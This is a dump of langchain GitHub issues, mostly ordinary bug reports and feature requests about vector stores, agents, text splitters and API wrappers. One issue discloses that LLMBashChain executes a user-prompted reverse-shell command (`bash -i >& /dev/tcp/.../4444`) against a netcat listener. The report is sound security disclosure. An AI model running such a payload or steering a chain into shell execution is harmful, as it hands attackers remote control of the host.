issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 261k ⌀ | issue_title stringlengths 1 925 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 2.5k | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 387k 2.46B | issue_number int64 1 127k |
|---|---|---|---|---|---|---|---|---|---|
[
"langchain-ai",
"langchain"
] | ### Feature request
Adapt the Pinecone vector store to support the upcoming starter tier. The changes are related to removing the namespaces and `delete by metadata` features.
### Motivation
Indexes in upcoming Pinecone V4 won't support:
* namespaces
* `configure_index()`
* delete by metadata
* `describe_index()` with metadata filtering
* `metadata_config` parameter to `create_index()`
* `delete()` with the `deleteAll` parameter
### Your contribution
I'll do it. | Pinecone: Support starter tier | https://api.github.com/repos/langchain-ai/langchain/issues/7472/comments | 6 | 2023-07-10T10:19:16Z | 2023-07-12T19:41:36Z | https://github.com/langchain-ai/langchain/issues/7472 | 1,796,444,479 | 7,472 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I want to be able to override `google_search_url` on the `GoogleSearchAPIWrapper` class, though that attribute does not exist yet.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.google_search.GoogleSearchAPIWrapper.html#langchain.utilities.google_search.GoogleSearchAPIWrapper
Just as `BingSearchAPIWrapper` allows overriding `bing_search_url`, I hope I can also override `google_search_url`.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.bing_search.BingSearchAPIWrapper.html#langchain.utilities.bing_search.BingSearchAPIWrapper.bing_search_url
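For illustration, the pattern being requested — an endpoint URL attribute with a default that the constructor can override, which is also what makes mocking possible — might look like the sketch below. This is a hypothetical class, not the actual LangChain implementation; the default URL shown is the Google Custom Search endpoint, used only as an example.

```python
class SearchAPIWrapper:
    """Hypothetical wrapper whose endpoint URL has an overridable default."""

    DEFAULT_URL = "https://customsearch.googleapis.com/customsearch/v1"

    def __init__(self, search_url=None):
        # Fall back to the real endpoint unless the caller overrides it,
        # e.g. to point the wrapper at a local mock server in tests.
        self.search_url = search_url or self.DEFAULT_URL

prod = SearchAPIWrapper()
mock = SearchAPIWrapper(search_url="http://localhost:8080/search")
```

With this shape, test code can swap in a mock URL without monkey-patching.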
### Motivation
I want to mock google API response.
### Your contribution
I don't think I am capable of implementing it myself. | Add google search API url | https://api.github.com/repos/langchain-ai/langchain/issues/7471/comments | 1 | 2023-07-10T09:23:14Z | 2023-10-16T16:05:24Z | https://github.com/langchain-ai/langchain/issues/7471 | 1,796,347,569 | 7,471 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.219
Python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chat_models import AzureChatOpenAI
from langchain.schema import HumanMessage
model = AzureChatOpenAI(
openai_api_base="baseurl",
openai_api_version="version",
deployment_name="name",
openai_api_key="key",
openai_api_type="type",
)
print(model(
[
HumanMessage(
content="Translate this sentence from English to French. I love programming."
)
]
))
```
I put in the relevant values (relevant configuration). Still, I am getting the error - **openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.**
### Expected behavior
It should run without any error. Because I took the code from the official documentation- https://python.langchain.com/docs/modules/model_io/models/chat/integrations/azure_chat_openai | openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. | https://api.github.com/repos/langchain-ai/langchain/issues/7470/comments | 2 | 2023-07-10T09:11:15Z | 2023-10-16T16:05:29Z | https://github.com/langchain-ai/langchain/issues/7470 | 1,796,327,821 | 7,470 |
[
"langchain-ai",
"langchain"
] | ### Feature request
starting from 1.26.1, Vertex SDK exposes chat_history explicitly.
### Motivation
currently you can't work with chat_history if you use a fresh version of Vertex SDK
### Your contribution
yes, I'll do it. | Support new chat_history for Vertex AI | https://api.github.com/repos/langchain-ai/langchain/issues/7469/comments | 1 | 2023-07-10T08:54:03Z | 2023-07-13T05:13:31Z | https://github.com/langchain-ai/langchain/issues/7469 | 1,796,298,829 | 7,469 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain 0.0.228
### Who can help?
@dev2049
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code is very similar to the existing example; instead of `Pinecone.from_documents` I use `Pinecone.from_existing_index`:
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
metadata_field_info = [
AttributeInfo(
name="IdentityId",
description="The id of the resident",
type="string",
),
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string"
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident",
type="string"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident",
type="string"
),
AttributeInfo(
name="Hometown",
description="The hometown of the resident",
type="string"
)
]
document_content_description = "General information about the resident, for example: phone number, cell phone number, address, birth date, owned technologies, more about me, education, college name, past occupations, past interests, whether he/she is a veteran or not, name of spouse, religious preferences, spoken languages, active life description, retired life description, accomplishments, marital status, anniversary date, his/her typical day, talents and hobbies, interest categories, other interest categories, favorite actor, favorite actress, etc."
llm = OpenAI(temperature=0)
vectordb = Pinecone.from_existing_index("default",embedding=embed, namespace="profiles5")
retriever = SelfQueryRetriever.from_llm(
llm, vectordb, document_content_description, metadata_field_info, verbose=True
)
qa_chain = RetrievalQA.from_chain_type(llm,retriever=retriever)
response = qa_chain.run(user_input)
st.write(response)
```
Error:
TypeError: 'NoneType' object is not callable
Traceback:
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 151, in <module>
main()
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 142, in main
retriever = SelfQueryRetriever.from_llm(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\retrievers\self_query\base.py", line 149, in from_llm
llm_chain = load_query_constructor_chain(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 142, in load_query_constructor_chain
prompt = _get_prompt(
^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 103, in _get_prompt
output_parser = StructuredQueryOutputParser.from_components(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 60, in from_components
ast_parser = get_parser(
^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\parser.py", line 148, in get_parser
transformer = QueryTransformer(
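For anyone hitting the same traceback: a `TypeError: 'NoneType' object is not callable` raised right at `transformer = QueryTransformer(` usually means the optional `lark` dependency is not installed (the parser class ends up as `None` when its import fails), so `pip install lark` is worth trying first. A quick environment check, using a hypothetical helper name:

```python
import importlib.util

def has_lark():
    # SelfQueryRetriever's query parser needs the optional `lark` package;
    # report whether it is importable in the current environment.
    return importlib.util.find_spec("lark") is not None

if not has_lark():
    print("Missing optional dependency - try: pip install lark")
```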
### Expected behavior
response to the query should be returned. | TypeError: 'NoneType' object is not callable in SelfQueryRetriever.from_llm | https://api.github.com/repos/langchain-ai/langchain/issues/7468/comments | 3 | 2023-07-10T08:33:10Z | 2023-07-10T13:36:01Z | https://github.com/langchain-ai/langchain/issues/7468 | 1,796,263,402 | 7,468 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I am using pgvector and hoping for an MMR retrieval method similar to the Qdrant implementation.
### Motivation
MMR retrieval can return more diverse results, removing duplicate rows, which meets my needs (I did some testing on Qdrant). However, I couldn't find an implementation in the pgvector vector store.
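For reference, the MMR re-ranking step itself is only a few lines once the raw vectors are available — a minimal pure-Python sketch, illustrative only and not the pgvector integration being requested:

```python
import math

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(x * x for x in b)))

def mmr(query_vec, doc_vecs, k=2, lambda_mult=0.5):
    """Maximal marginal relevance: trade off relevance to the query
    against similarity to already-selected docs, skipping near-duplicates."""
    selected = []
    candidates = list(range(len(doc_vecs)))
    while candidates and len(selected) < k:
        def score(i):
            relevance = cosine(query_vec, doc_vecs[i])
            redundancy = max((cosine(doc_vecs[i], doc_vecs[j]) for j in selected), default=0.0)
            return lambda_mult * relevance - (1 - lambda_mult) * redundancy
        best = max(candidates, key=score)
        selected.append(best)
        candidates.remove(best)
    return selected

# Doc 1 is a near-duplicate of doc 0; with a diversity-leaning lambda,
# MMR picks the most relevant doc and then the diverse one.
picked = mmr([1.0, 0.0], [[1.0, 0.0], [0.99, 0.01], [0.0, 1.0]], k=2, lambda_mult=0.3)
```

The missing piece in pgvector is exactly the raw vectors this function needs, which is why returning them (even optionally) matters.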
### Your contribution
I found that in the current implementation of the pgvector class, the retrieval results do not return the original vectors, so it is not possible to simply add MMR post-processing. Is this due to performance considerations? Have you considered adding an option for this? | pgvector add implemention of MMR | https://api.github.com/repos/langchain-ai/langchain/issues/7466/comments | 3 | 2023-07-10T08:08:26Z | 2023-11-28T16:16:39Z | https://github.com/langchain-ai/langchain/issues/7466 | 1,796,222,961 | 7,466 |
[
"langchain-ai",
"langchain"
] | ### System Info
```
LangChain version v0.0.228
Linux * 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Python 3.9.13
```
### Who can help?
@hwchase17
@agola11
@coyotespike
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduce with these steps:
1. `nc -lvp 4444` : open port 4444 with a netcat listener.
2. Run the below code.
```python
from langchain.chains import LLMBashChain
from langchain.llms import OpenAI
llm = OpenAI(temperature=0)
text = "Please write a bash script that executes `bash -c 'bash -i >& /dev/tcp/0.0.0.0/4444 0>&1'`"
bash_chain = LLMBashChain.from_llm(llm, verbose=True)
bash_chain.run(text)
```
3. You can get the reverse shell code.
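For illustration, even a crude pattern-based guard would catch this particular payload. This is a hypothetical sketch, not an existing LangChain feature — and blocklists are easy to bypass, so it is mitigation, not a fix:

```python
# Hypothetical guard: refuse generated bash commands that match
# well-known reverse-shell / destructive patterns.
SUSPICIOUS_PATTERNS = ["/dev/tcp/", "nc -e", "bash -i", "rm -rf /"]

def is_suspicious(command):
    lowered = command.lower()
    return any(pattern in lowered for pattern in SUSPICIOUS_PATTERNS)

payload = "bash -c 'bash -i >& /dev/tcp/0.0.0.0/4444 0>&1'"
blocked = is_suspicious(payload)  # matches both "/dev/tcp/" and "bash -i"
```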
### Expected behavior
The bash chain is very vulnerable. I think it should print a warning message or block the execution, but it just executes my script. This chain is too dangerous to use in production, isn't it? | BashChain allows Remote Control Execution. | https://api.github.com/repos/langchain-ai/langchain/issues/7463/comments | 1 | 2023-07-10T06:43:43Z | 2023-10-16T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7463 | 1,796,085,216 | 7,463 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.208 python==3.10.12 linux==Ubuntu 20.04.6 LTS
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.llms import OpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationBufferMemory
llm = OpenAI(model="text-davinci-003", temperature=0)
conversation = ConversationChain(
llm=llm,
verbose=True,
memory=ConversationBufferMemory()
)
# Start the conversation
conversation.predict(input="Tell me about yourself.")
# Continue the conversation
conversation.predict(input="What can you do?")
conversation.predict(input="How can you help me with data analysis?")
# Display the conversation
print(conversation)
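For context, the usual fix for this class of leak is a `SecretStr`-style wrapper (as in pydantic) whose repr masks the value — a minimal stdlib sketch of the idea, not LangChain's actual code:

```python
class Secret:
    """Minimal SecretStr-style wrapper: repr()/str() never expose the
    value; callers must ask for it explicitly."""

    def __init__(self, value):
        self._value = value

    def __repr__(self):
        return "Secret('**********')"

    __str__ = __repr__

    def get_secret_value(self):
        return self._value

key = Secret("sk-super-secret")
shown = repr(key)               # masked when the chain's memory is dumped
raw = key.get_secret_value()    # explicit opt-in to the real key
```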
### Expected behavior
OpenAI should use the env variable for openai_api_key and not allow ConversationChain to leak it via `memory=ConversationBufferMemory()`. | openai_api_key stored as string | https://api.github.com/repos/langchain-ai/langchain/issues/7462/comments | 2 | 2023-07-10T06:32:59Z | 2023-10-16T16:05:39Z | https://github.com/langchain-ai/langchain/issues/7462 | 1,796,067,285 | 7,462 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hello everyone!
I'm trying to use an LLM model to query data from the Open Targets Platform (they give information about diseases and their links with molecules, etc.). They have an endpoint that can be accessed using GraphQL, and the platform defines several query structures for different kinds of data requests. In the following example I give the model 3 different query structures:
```python
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType, Tool
from langchain.utilities import GraphQLAPIWrapper
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
# 1.1) Prompt template (in case we need to do some prompt engineering)
prompt = PromptTemplate(
input_variables=["query"],
template="{query}"
)
# 1.2) LLM Model , in this case a LLM modelo from OpenAI
llm = OpenAI(openai_api_key="YOURKEY",
model_name="gpt-3.5-turbo", temperature=0.85)
# 1.3) Creation of the chain object (integrates the llm and the prompt template)
llm_chain = LLMChain(llm=llm, prompt=prompt)
# 2.1) We set up the LLM as a tool in order to answer general questions
llm_tool = Tool(name='Language Model',
func=llm_chain.run,
description='use this tool for general purpose queries and logic')
# 2.2) We set up the graphql tool
graph_tool = load_tools( # IMPORTANT: we use load_tools because it is already a built-in LangChain tool
tool_names = ["graphql"],
graphql_endpoint="https://api.platform.opentargets.org/api/v4/graphql",
llm=llm)
# 2.3) List of tools that the agent will take
tools = [llm_tool, graph_tool[0]]
agent = initialize_agent(
agent="zero-shot-react-description", # Type of agent
    tools=tools, # the tools we give the agent
llm=llm,
verbose=True,
max_iterations=3)
# IMPORTANT: the zero-shot ReAct agent has no memory; every answer it gives is for a single question. In case you want an agent with memory, you have to use another agent type such as Conversational ReAct
type(agent)
prefix = "This questions are related to get medical information, specifically data from OpenTargetPlatform, " \
"If the question is about the relation among a target and a diseases use the query TargetDiseases, " \
"If the question is about the relation among diseases and targets then use the query DiseasesTargets, " \
"If the question request evidence between a disease and targets then use the query targetDiseaseEvidence"
graphql_fields = """
query TargetDiseases {
target(ensemblId: "target") {
id
approvedSymbol
associatedDiseases {
count
rows {
disease {
id
name
}
datasourceScores {
id
score
}
}
}
}
}
query DiseasesTargets {
disease(efoId: "disease") {
id
name
associatedTargets {
count
rows {
target {
id
approvedSymbol
}
score
}
}
}
}
query targetDiseaseEvidence {
disease(efoId: "disease") {
id
name
evidences(datasourceIds: ["intogen"], ensemblIds: ["target"]) {
count
rows {
disease {
id
name
}
diseaseFromSource
target {
id
approvedSymbol
}
mutatedSamples {
functionalConsequence {
id
label
}
numberSamplesTested
numberMutatedSamples
}
resourceScore
significantDriverMethods
cohortId
cohortShortName
cohortDescription
}
}
}
}
"""
suffix = "What are the targets of vorinostat?"
#answer= agent.run(prefix+ suffix + graphql_fields)
answer= agent.run(suffix + prefix+ graphql_fields)
answer
```
When I have 2 query structures it works well. However, when I add the third, as in this example, different kinds of errors start to show up.
Any recommendation about this? Should I separate the query structures? Or is the order of elements wrong in my agent?
I would appreciate your help so much!
Orlando
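One workaround that often helps with this kind of setup: classify the question yourself before invoking the agent, and include only the matching query structure in the prompt, so the model never has to choose among three. A crude keyword-routing sketch — the routing logic is hypothetical, only the query names come from the example above:

```python
# Hypothetical pre-routing step: pick ONE GraphQL query structure per
# question instead of handing the agent all three at once.
def pick_template(question):
    q = question.lower()
    if "evidence" in q:
        return "targetDiseaseEvidence"
    if "target" in q:          # e.g. "What are the targets of ...?"
        return "DiseasesTargets"
    return "TargetDiseases"

template = pick_template("What are the targets of vorinostat?")
```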
### Suggestion:
_No response_ | Help using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7459/comments | 1 | 2023-07-10T05:22:54Z | 2023-10-16T16:05:45Z | https://github.com/langchain-ai/langchain/issues/7459 | 1,795,972,865 | 7,459 |
[
"langchain-ai",
"langchain"
] | Hi there,
I am new to LangChain and I encountered some problems when importing `langchain.agents`.
I run `main.py` as follows:
```python
# main.py
# python main.py
import os
os.environ["OPENAI_API_KEY"]="my key"
import langchain.agents
```
Some errors occur:
```
Traceback (most recent call last):
File "F:\LLM_publichousing\me\main.py", line 6, in <module>
import langchain.agents
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\__init__.py", line 54, in <module>
from langchain.document_loaders.github import GitHubIssuesLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\github.py", line 37, in <module>
class GitHubIssuesLoader(BaseGitHubLoader):
File "pydantic\main.py", line 197, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 506, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 663, in pydantic.fields.ModelField._type_analysis
File "pydantic\fields.py", line 808, in pydantic.fields.ModelField._create_sub_type
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 668, in pydantic.fields.ModelField._type_analysis
File "C:\ProgramData\Anaconda3\envs\ly\lib\typing.py", line 852, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
```
The langchain version is `0.0.228`
My system is Windows 10. | Error occurs when `import langchain.agents` | https://api.github.com/repos/langchain-ai/langchain/issues/7458/comments | 6 | 2023-07-10T04:43:44Z | 2023-10-21T16:07:20Z | https://github.com/langchain-ai/langchain/issues/7458 | 1,795,933,159 | 7,458 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain 0.0.228
python 3.11.1
LLM: self hosting llm using [text-generation-inference](https://github.com/huggingface/text-generation-inference)
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
There is a Sample Input in the description for `InfoSQLDatabaseTool` ([this line](https://github.com/hwchase17/langchain/blob/560c4dfc98287da1bc0cfc1caebbe86d1e66a94d/langchain/agents/agent_toolkits/sql/toolkit.py#L48C18-L48C18)), and the Sample Input wraps each table name in a pair of single quotes, which misleads the LLM into also wrapping the Action Input in single quotes.
An example of the LLM behaviour:
```console
$ agent_executor.run("According to the titanic table, how many people survived?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table seems relevant, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
Thought:I should list all the tables in the database first.
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table is in the database, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
```
This next example is even clearer (note the Action Input):
```console
$ agent_executor.run("When is the last dataset created?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The 'dataset' and 'dataset_version' tables seem relevant. I should query the schema for these tables.
Action: sql_db_schema
Action Input: 'dataset, dataset_version'
Observation: Error: table_names {"dataset_version'", "'dataset"} not found in database
```
After removing the quotes around the Example Input, the SQL agent works fine.
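The failure mode is easy to see in isolation — the tool checks the raw Action Input strings against the set of known table names, so the quotes become part of the name. A simplified stdlib model of that lookup:

```python
known_tables = {"titanic", "dataset", "dataset_version"}

def missing_tables(action_input):
    # Simplified model of the tool's lookup: names are split on commas and
    # whitespace-stripped, but quotes are NOT stripped, so "'titanic'"
    # can never match "titanic".
    requested = {name.strip() for name in action_input.split(",")}
    return requested - known_tables

bad = missing_tables("'titanic'")   # quoted name is not found
good = missing_tables("titanic")    # unquoted name matches
```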
### Expected behavior
The Action Input of `InfoSQLDatabaseTool` should be a list of table names, not a quoted str. | The single quote in Example Input of SQLDatabaseToolkit will mislead LLM | https://api.github.com/repos/langchain-ai/langchain/issues/7457/comments | 16 | 2023-07-10T04:17:49Z | 2024-02-14T16:13:03Z | https://github.com/langchain-ai/langchain/issues/7457 | 1,795,907,276 | 7,457 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.195
python==3.9.17
system-info==ubuntu
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Copy paste this code:
```
async def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = await agent.arun(question)
return answer
response = await csv_qa("question_about_csv")
```
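Until the Python REPL tool implements the async interface, one common workaround is to run the synchronous `agent.run` in a thread executor so the event loop stays responsive. A sketch with a stand-in blocking function in place of the real agent:

```python
import asyncio

def blocking_agent_run(question):
    # Stand-in for the synchronous agent.run(question).
    return "answer to: " + question

async def csv_qa(question):
    loop = asyncio.get_running_loop()
    # Off-load the sync call to the default thread pool so the event
    # loop is not blocked while the agent works.
    return await loop.run_in_executor(None, blocking_agent_run, question)

result = asyncio.run(csv_qa("question_about_csv"))
```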
### Expected behavior
It should return the same response as using `run`:
```
def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = agent.run(question)
return answer
response = csv_qa("question_about_csv")
``` | Getting ` NotImplementedError: PythonReplTool does not support async` when trying to use `arun` on CSV agent | https://api.github.com/repos/langchain-ai/langchain/issues/7455/comments | 3 | 2023-07-10T02:48:11Z | 2024-02-14T16:13:08Z | https://github.com/langchain-ai/langchain/issues/7455 | 1,795,819,951 | 7,455 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: 0.0.208
platform: win 10
python: 3.9.
The warning message is :
'Created a chunk of size 374, which is longer than the specified 100'.
### Who can help?
@hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**Step 1: run the code snippet below:**
```python
from langchain.document_loaders import TextLoader
from langchain.text_splitter import CharacterTextSplitter

text = '''
Google opens up its AI language model PaLM to challenge OpenAI and GPT-3
Google is offering developers access to one of its most advanced AI language models: PaLM.
The search giant is launching an API for PaLM alongside a number of AI enterprise tools
it says will help businesses “generate text, images, code, videos, audio, and more from
simple natural language prompts.”
PaLM is a large language model, or LLM, similar to the GPT series created by OpenAI or
Meta’s LLaMA family of models. Google first announced PaLM in April 2022. Like other LLMs,
PaLM is a flexible system that can potentially carry out all sorts of text generation and
editing tasks. You could train PaLM to be a conversational chatbot like ChatGPT, for
example, or you could use it for tasks like summarizing text or even writing code.
(It’s similar to features Google also announced today for its Workspace apps like Google
Docs and Gmail.)'''

with open('test.txt', 'w') as f:
    f.write(text)

loader = TextLoader('test.txt')
docs_from_file = loader.load()
print(docs_from_file)

text_splitter1 = CharacterTextSplitter(chunk_size=100, chunk_overlap=20)
docs = text_splitter1.split_documents(docs_from_file)
print(docs)
print(len(docs))
```
**Step 2:** the text is then not split into chunks of the expected size.
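For what it's worth, `CharacterTextSplitter` splits on a single separator (`"\n\n"` by default) and never cuts inside a piece — any paragraph longer than `chunk_size` is emitted whole, which is exactly what the warning reports. A stdlib sketch of that behavior (a simplified model, not the real class):

```python
def split_like_character_splitter(text, chunk_size, separator="\n\n"):
    # Simplified model of CharacterTextSplitter: the text is only cut at
    # the separator; a piece longer than chunk_size passes through whole
    # (the real class logs the "longer than the specified" warning).
    pieces = [p for p in text.split(separator) if p]
    oversized = [p for p in pieces if len(p) > chunk_size]
    return pieces, oversized

text = "short paragraph\n\n" + "x" * 374
pieces, oversized = split_like_character_splitter(text, chunk_size=100)
```

`RecursiveCharacterTextSplitter`, which falls back through a list of smaller separators, is usually the fix when chunks must actually respect `chunk_size`.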
### Expected behavior
It should split the document into chunks of approximately `chunk_size` characters. | 'chunk_size' doesnt work on 'split_documents' function | https://api.github.com/repos/langchain-ai/langchain/issues/7452/comments | 2 | 2023-07-10T00:33:09Z | 2023-07-13T00:41:21Z | https://github.com/langchain-ai/langchain/issues/7452 | 1,795,665,180 | 7,452 |
[
"langchain-ai",
"langchain"
] | Adding a unit test for any experimental module in the standard location, such as `tests/unit_tests/experimental/test_baby_agi.py`, leads to this failing unit test:
```python
../tests/unit_tests/output_parsers/test_base_output_parser.py ...................................F
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> traceback >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def test_all_subclasses_implement_unique_type() -> None:
types = defaultdict(list)
